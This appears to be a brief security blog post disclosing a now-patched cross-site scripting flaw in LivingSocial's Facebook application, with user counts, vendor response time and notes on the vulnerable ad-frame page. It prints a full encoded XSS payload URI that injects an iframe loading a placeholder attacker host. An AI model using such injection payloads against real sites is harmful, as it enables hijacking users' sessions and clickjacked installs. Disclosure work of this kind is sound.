FAXX Hack: LivingSocial

I originally planned on posting a different application today, but since that hole remains unpatched, I decided to wait another day and simply move down the leaderboard with a vulnerability I found yesterday.

Facebook Verified Application

Current Monthly Active Users: 23,688,212

Current Rank on Application Leaderboard: 3

Application Developer: LivingSocial

Responsiveness: LivingSocial responded within half an hour to let me know the hole was patched.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/livingsocial/micro/ad_manager/t/frame?campaign=%22)%3B%3C%2Fscript%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.livingsocial.com%2Fmicro%2Fad_manager%2Ft%2Fframe%3Fcampaign%3D%2522)%253B%253C%252Fscript%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252EVILURI%252F%2522%253E%253Cscript%253Ex%253D(%2522%22%3E%3Cscript%3Ex%3D(%22

Notes: This example serves as a reminder to leave no page unexamined when looking for vulnerabilities.  The hijacked page is normally used in an iframe for serving ads within the application, but since it resides at the same location as the application itself, it can be accessed via apps.facebook.com to launch an attack.